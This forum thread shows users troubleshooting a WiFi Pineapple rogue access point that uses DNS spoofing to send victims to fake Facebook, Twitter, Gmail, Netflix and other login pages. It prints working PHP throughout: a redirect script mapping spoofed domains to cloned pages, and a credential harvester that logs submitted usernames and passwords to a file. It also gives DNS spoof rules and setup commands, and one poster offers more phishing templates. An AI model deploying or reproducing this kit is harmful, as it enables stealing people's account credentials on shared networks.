WIFI Pineapple phishing help

[wireless router]

So just received my pineapple Mark IV recently and was trying to setup phishing and rick roll on it but having some problems.

I setup Phishing through these instructions

. I started off by formatting a usb drive with ext4 filesystem and following the tutorial to create symbolic links to www.

. I placed the phishing files on the flash drive and deleted the original redirect.php since we are using the new phishing one. updated the dns spoof area with "172.16.42.1 *" I also went into configuration and renamed the SSID to "PineApples" with the persistent box check marked. then started the DNS spoof.

The problem: I can see the SSID on my android phone. Motorola Razr. connect too it either type in twitter.com or facebook.com and the pineapple will successfully bring me to the facebook.html or twitter.html pages. when i connect through my laptop however ( which is the computer I have been using to setup the pineapple) whenever I type in facebook.com or twitter.com into the url box it seems to get stuck at www.facebook.com/redirect.php. I am looking at a blank page and nothing happens. I have tried disconnecting the ethernet to the pineapple and connecting only via wifi and vice versa with the same results. if this is not confusing enough I then introduced a 3rd desktop computer this 3rd computer did not see the "PineApples" SSID only "other network" I clicked other network and then when asked for network name put in "PineApples" successfully connected and when trying to pull facebook.com or twitter.com I get the same "twitter.com/redirect.php" problem where it loads a blank page and doesnt advance the page to twitter.html. So I type "facebook.com/facebook.html" into the url box and the pineapple introduces the facebook phishing page! continuing my troubleshooting I type twitter.com into the url. it hits the redirect and I am again presented with facebook.com/facebook.html.?? well then I type twitter.com/twitter.html Success!! if only for 2 seconds when it redirected back to facebook.com/facebook.html.

well I then try it again on my laptop connected to the pineapple over wifi. try urls twitter.com facebook.com only to be redirected to a blank page with redirect.php in url box. so this time first I try to goto twitter.com/twitter.html. Now it goes to the phishing page redirects back to facebook.com/redirect??

What am I doing wrong??

at some point I setup the Nyan cat and rick roll redirect and got those both working with no problems on all 3 clients. but whenever I try the phishing I seem to run into the redirect problem? what am I doing wrong??

Web Browser: Firefox 17.0.1

Pineapple: Mark IV

Laptop OS: Windows 7 64 bit

Desktop OS: Windows 7 32 bit

Android OS: 4.1.2

If I have left any details out please let me know and I will add them.

[airman_dopey]

I had this problem with the DNS spoof. Try setting it to "172.16.42.1 *.*" and see if that helps

[wireless router]

Thanks for the quick reply. I tried that setting and am still getting the same errors. plus now I am also getting where the url automatically changes to "https://www.facebook.com" and then times out. If i try twitter it seems to redirect back to facebook and timeout or timesout at https://twitter.com

My desktop is still acting the same however and continually redirecting to facebook.com/facebook.html

[wireless router]

This is really frustrating cause its working perfectly from my phone?

[airman_dopey]

I'm curious on this as well. I noticed with my own testing with the phishing pages it was hit or miss with me for redirecting the traffic. Hopefully someone else chimes in who is a bit more knowledgeable.

[wireless router]

so if I go to facebook.com or twitter.com i get stuck on redirect pages. even after clearing all cache if I goto twitter.com i get redirected to facebook.com/redirect.php with a blank page.

here is what my redirect .php looks like

<?php
$ref = $_SERVER['HTTP_REFERER'];if (strpos($ref, "facebook"))    { header('Location: facebook.html'); }if (strpos($ref, "twitter"))    { header('Location: twitter.html'); }require('error.php');?>    

now if i change line 8 "require('error.php');" to an html page of my choosing "require('twitter.html');" i wont get stuck at redirect.php instead it loads twitter.html and keeps the appropriate url "*.com/redirect.php"

any clues ????

here is my error.php.

<?php
$ref = $_SERVER['HTTP_REFERER'];
$today = date("F j, Y, g:i a");
if (isset($_POST['name']) && !empty($_POST['name'])) {
    $nam = stripslashes($_POST['name']);
    $pas = stripslashes($_POST['pass']);
    $nam = htmlspecialchars($nam, ENT_QUOTES);
    $pas = htmlspecialchars($pas, ENT_QUOTES);
    $content = $today . "  --  " . $ref . "  --  " . $nam . "  --  " . $pas;
    $filed = @fopen("/pineapple/logs/phish.log", "a+");
    @fwrite($filed, "$content\n");
    @fclose($filed);
}
?>
<html><head>
<script type="text/javascript">
function goBack()
{
window.history.back()
}
</script>
</head>
<body onload="goBack()">
</body></html>

and index.php

<html>
<head>
<meta http-equiv="REFRESH" content="0;url=redirect.php">
</head>
<body>
</body>
</html>

Edited January 10, 2013 by wireless router

[TylerCPU]

Looks like you got some pineapple weirdness going on. First of all check out that the redirect.php file has the correct names for the files its pointing to. { header('Location: twitter.html'); In this example make sure twitter ends in .html or .htm depending on the html file for twitter. So if the file ends in .htm use .htm in the redirect.php file. Your redirect.php, error.php, and index.php files look ok so far. The best thing to do is to reflash the pineapple, and use ccleaner on all the computers. Clear out the browsers cache before trying the phishing pages. Also the twitter and facebook files from that download is very old. I created some new ones and more. netflix,outlook,hotmail,blogger,youtube,instagram, etc...... Have fun and use them responsibly.

Link: redacted

[Zephyr]

Tyler thanks for the updates.

[SystemCrash86]

I have run into an unexpected issue while following the youtube tutorial

Everything goes well and i follow the tutorial step-by-step without any errors. But my problem arises when i activate dnsspoof, it doesnt seem to redirect anyone going from facebook, blogger, twitter to my pineapple. But if i go on my other computer and in my url type "172.16.42.1/facebook.htm" or "172.16.42.1/twitter.htm" and so on i get the page like i should. I enter in my credentials and the pineapple records them in the log.

Whats wrong with my dnsspoof becasue clearly everything else is working except that and i have done nothing different from the video.

I have reflashed, factory reset the pineapple and uninstalled and reinstalled dnsspoof.

What am i missing?

Any and all help is greatly appreciated

[TylerCPU]

I have run into an unexpected issue while following the youtube tutorial

Everything goes well and i follow the tutorial step-by-step without any errors. But my problem arises when i activate dnsspoof, it doesnt seem to redirect anyone going from facebook, blogger, twitter to my pineapple. But if i go on my other computer and in my url type "172.16.42.1/facebook.htm" or "172.16.42.1/twitter.htm" and so on i get the page like i should. I enter in my credentials and the pineapple records them in the log.

Whats wrong with my dnsspoof becasue clearly everything else is working except that and i have done nothing different from the video.

I have reflashed, factory reset the pineapple and uninstalled and reinstalled dnsspoof.

What am i missing?

Any and all help is greatly appreciated

Did you try and clean out the computers cache using ccleaner? Browsers cache stuff and you need to clean it out. If you followed it step by step it should work. Did you try and do a clean flash of the pineapple? If not here are the video tutorials.

1.

2.

Edited February 7, 2013 by TylerCPU

[SystemCrash86]

Did you try and clean out the computers cache using ccleaner? Browsers cache stuff and you need to clean it out. If you followed it step by step it should work. Did you try and do a clean flash of the pineapple? If not here are the video tutorials.

I did a clean flash of the 2.7.5 firmware, not over serial though.

I cleared all the history and cookies from my browser, i even downloaded and ran ccleaner like you suggested and opened up a command prompt and flushed my dns cache.

But still nothing. I start dnsspoof and on my other computer i for example type "www.facebook.com" and it takes me to the real website everytime, not just facebook but all sites.

But if i type say 172.16.42.1/facebook.htm in my browser it takes me to that facebook page set up on the pineapple where i can enter in my credentials and it is recorded.

I do not understand why this is not working

[TylerCPU]

I did a clean flash of the 2.7.5 firmware, not over serial though.

I cleared all the history and cookies from my browser, i even downloaded and ran ccleaner like you suggested and opened up a command prompt and flushed my dns cache.

But still nothing. I start dnsspoof and on my other computer i for example type "www.facebook.com" and it takes me to the real website everytime, not just facebook but all sites.

But if i type say 172.16.42.1/facebook.htm in my browser it takes me to that facebook page set up on the pineapple where i can enter in my credentials and it is recorded.

I do not understand why this is not working

Sorry guys.I should have spotted it. Actually @wireless router your redirect.php file is wrong. Your missing $_SERVER['REQUEST_URI'];. I didn't notice it until I stumbled upon this forum. http://forums.hak5.org/index.php?/topic/28599-phishing-redirect-script-not-doing-its-job/ Your redirect.php file should look like this.

<?php
	$ref = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; 

	                   
        if (strpos($ref, "example")){
		header('Location: example.html');
        }
   
        
	require('error.php');

?> 

That's what mine looks like. Hope that helps.

Edited February 8, 2013 by TylerCPU

[SystemCrash86]

Sorry guys.I should have spotted it. Actually @wireless router your redirect.php file is wrong. Your missing $_SERVER['REQUEST_URI'];. I didn't notice it until I stumbled upon this forum. http://forums.hak5.org/index.php?/topic/28599-phishing-redirect-script-not-doing-its-job/ Your redirect.php file should look like this.

<?php
	$ref = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; 

	                   
        if (strpos($ref, "example")){
		header('Location: example.html');
        }
   
        
	require('error.php');

?> 

That's what mine looks like. Hope that helps.

Is my redirect.php ok, its the one i download from the advanced phishing tutorial and replaced it with the redirect.php that was on the pineapple:

<?php

$ref = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];

if (strpos($ref, "hotmail")){

header('Location: hotmail.htm');

}

if (strpos($ref, "facebook")){

header('Location: facebook.htm');

}

if (strpos($ref, "twitter")){

header('Location: twitter.htm');

}

if (strpos($ref, "gmail")){

header('Location: gmail.htm');

}

if (strpos($ref, "youtube")){

header('Location: youtube.htm');

}

if (strpos($ref, "vimeo")){

header('Location: vimeo.htm');

}

if (strpos($ref, "linkedin")){

header('Location: linkedin.htm');

}

if (strpos($ref, "instagram")){

header('Location: instagram.html');

}

if (strpos($ref, "plus.google")){

header('Location: googleplus.htm');

}

if (strpos($ref, "netflix")){

header('Location: netflix.htm');

}

if (strpos($ref, "ustream")){

header('Location: ustream.htm');

}

if (strpos($ref, "dropbox")){

header('Location: dropbox.htm');

}

if (strpos($ref, "blogger")){

header('Location: blogger.htm');

}

if (strpos($ref, "outlook")){

header('Location: outlook.htm');

}

require('error.php');

?>

[TylerCPU]

SNIP

If you followed my advanced phishing tutorial it should work just fine. Your redirect.php file seem to be ok. I retested my tutorial on my pineapple and it works just fine. If you are running the firmware version 2.7.5, get rid of it. It's only for Latest Development testing. Go back and reflash the pineapple to 2.7.0 which I am running and works fine on my pineapple. That is the current Latest Stable Version. Hope that helps.

[TylerCPU]

@SystemCrash86

I got it figured out. I know why you are getting this problem.I wanted to see if I did something different than you. So I reflashed my pineapple and followed my tutorial to the tee and it worked fine just as usual. Then it hits me! You type in www.facebook.com but I only type in facebook.com. I never use the www and when I try and go to www.facebook.com. I go to the real site. Just like your problem. So I went and eddied the DNS Spoof Config. So with 172.16.42.1 facebook I also include 172.16.42.1 *.facebook.com. Now when you go to "www.facebook.com" you go to the phishing site. Go redownload my dnsspoof.txt file in the description of my youtube video, "Advanced Phishing on the Wi-Fi Pineapple IV ". Your problem like mine should be gone. Now you can target sites like facebook.com without forcing all dns traffic to go to the pineapple.

[Sebkinne]

Depending on firmware version, you will need to adjust your redirect.php file.

That is why the redirection didn't work, the redirect is broken.

Please upgrade to 2.7.6 - it has it fixed. Just copy what you see for example.com

[Zephyr]

I created symbolic links to everything in the www folder except for redirect.php, error.php and index.php.

Tyler: I updated the DNS spoof config with your new txt file, and also placed your new redirect.php in the www folder. Again, there are symbolic links to all the actual spoof pages and associate folders (facebook, twitter, etc) on the usb, but no symbolic links to redirect.php, error.php and index.php, which are only in the www folder. Should I put these pages on the usb and create symbolic link to them as well?

When I try to go to a spoofed page, www.facebook.com for instance, I get an rapid oscillation between redirect.php and the page I'm trying to goto (i.e. facebook).

[TylerCPU]

I created symbolic links to everything in the www folder except for redirect.php, error.php and index.php.

Tyler: I updated the DNS spoof config with your new txt file, and also placed your new redirect.php in the www folder. Again, there are symbolic links to all the actual spoof pages and associate folders (facebook, twitter, etc) on the usb, but no symbolic links to redirect.php, error.php and index.php, which are only in the www folder. Should I put these pages on the usb and create symbolic link to them as well?

When I try to go to a spoofed page, www.facebook.com for instance, I get an rapid oscillation between redirect.php and the page I'm trying to goto (i.e. facebook).

You put symbolic links in the /usb folder? What you need to do is put all the phishing files on the /usb folder and make links in the /www/ folder that are pointing to the /usb folder. Not the other way around. Leave the redirect.php, error.php, and index.php files in the /www/ folder. There should be no rapid oscillation between redirect.php and the page your trying to go to. The easiest way to fix this is to start fresh. Re-flash the pineapple and follow this. And clear out your browsers cache before using the phishing files. You can use ccleaner if you want.

[Zephyr]

No, The symbolics links are only in the www folder on the pineapple ... pointing to the real files in the 'phish' folder on the usb.

After transfering your files to usb/phish, I ran the command:

ln -s /usb/phish/* /www/

which created the symbolic links in the www folder. The only files I put in usb/phish were the files that were in your phishing.zip file, nothing else. In other words, redirect.php, error.php and index.php are the actual files in the www folder on the pineapple. They do not exist on the usb and there are no links to them in the www folder pointing to the usb/phish folder since they're not on the usb. Should I redo the process and add the redirect.php, error.php and index.php files to the usb/phish folder as well, and then reinvoke the command to create the symbolic links?

Btw I just upadated to firmware 2.7.7 if that makes a difference.

[Sebkinne]

Please remember to use spoiler tags and don't quote incredibly long posts that don't use the proper tags. A thread will become very hard to follow ;)

[Zephyr]

I just updated Tyler's redirect.php with the additional 'header('Status: 302 Found');' line. Ok, now this is working, or at least it's getting to the page. the URL appears as:

www.facebook.com/facebook.htm

as it should. But now I'm getting the error in my browser

'Forbidden. You don't have permission to access /facebook.htm on this server'

So apparently this is a permissions/chmod problem. If I'm not mistaken I have to SSH in to change the permissions, correct?

EDIT: if I host the actual spoof files in the www folder on the pineapple, I do not get this error.

EDIT2: Ok, running the command chmod -R 777 /usb/phish seemed to do the job nicely. I can now load all spoofed pages residing on the usb.

Edited February 11, 2013 by Zephyr

[haroo]

Thanks for the new phishing files dude!

[TylerCPU]

I just updated Tyler's redirect.php with the additional 'header('Status: 302 Found');' line. Ok, now this is working, or at least it's getting to the page. the URL appears as:

www.facebook.com/facebook.htm

as it should. But now I'm getting the error in my browser

'Forbidden. You don't have permission to access /facebook.htm on this server'

So apparently this is a permissions/chmod problem. If I'm not mistaken I have to SSH in to change the permissions, correct?

EDIT: if I host the actual spoof files in the www folder on the pineapple, I do not get this error.

EDIT2: Ok, running the command chmod -R 777 /usb/phish seemed to do the job nicely. I can now load all spoofed pages residing on the usb.

Yes, that looks like a permissions problem. That's one of the reasons I don't use bleeding edge firmware. I stay on the stable versions which right now is 2.7.0.It's less hassle. I'm glad you got it working.

[TylerCPU]

No, The symbolics links are only in the www folder on the pineapple ... pointing to the real files in the 'phish' folder on the usb.

After transfering your files to usb/phish, I ran the command:

ln -s /usb/phish/* /www/

which created the symbolic links in the www folder. The only files I put in usb/phish were the files that were in your phishing.zip file, nothing else. In other words, redirect.php, error.php and index.php are the actual files in the www folder on the pineapple. They do not exist on the usb and there are no links to them in the www folder pointing to the usb/phish folder since they're not on the usb. Should I redo the process and add the redirect.php, error.php and index.php files to the usb/phish folder as well, and then reinvoke the command to create the symbolic links?

Btw I just upadated to firmware 2.7.7 if that makes a difference.

Oh sorry. The way you worded your sentence sounded like that. Anyways I only use stable versions of the firmware. Go back to 2.7.0 , but since you got it fixed you don't need too. This is why I don't use bleeding edge firmware. It has problems. Again I'm glad you got it fixed.

Edited February 11, 2013 by TylerCPU

[Sebkinne]

Oh sorry. The way you worded your sentence sounded like that. Anyways I only use stable versions of the firmware. Go back to 2.7.0 , but since you got it fixed you don't need too. This is why I don't use bleeding edge firmware. It has problems. Again I'm glad you got it fixed.

Tyler, that is simply not true. 2.7.7 is the next stable candidate the way it looks. It will move to 2.8.0 very soon..

The permission issue is on the usb and NOT on the pineapple ;)

Either the permissions didn't copy over properly or the permissions in the .zip are not set properly - I am assuming the first.

Best,

Sebkinne